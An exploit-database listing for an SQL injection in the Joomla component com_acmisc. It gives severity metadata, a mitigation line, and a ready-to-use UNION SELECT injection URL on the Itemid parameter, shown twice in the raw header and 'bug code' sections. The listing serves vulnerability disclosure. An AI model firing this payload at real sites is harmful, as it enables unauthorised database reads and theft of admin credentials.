header-logo
Suggest Exploit
vendor:
com_acmisc
by:
Fl0riX
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_acmisc
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_acmisc SQL injection Vulnerability

An attacker can exploit this vulnerability to gain access to admin login credentials by exploiting the SQL injection vulnerability in the com_acmisc component of Joomla.

Mitigation:

Input validation should be done to filter out malicious characters.
Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
       Joomla Component com_acmisc SQL injection Vulnerability                                           
#############################################################

# author        : Fl0riX

# Name        : com_acmisc

# Bug Type       : SQL Injection

# Infection      : Admin login bilgileri al&#65533;nabilir.

# Demo Vuln.     :
http://server/index.php?option=com_acmisc&page=5&Itemid=null/**/union/**/select/**/0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*--

# Bug Fix Advice : Zararl&#65533; karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_acmisc&page=5&Itemid=null/**/union/**/select/**/0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*--

< -- bug code end of -- >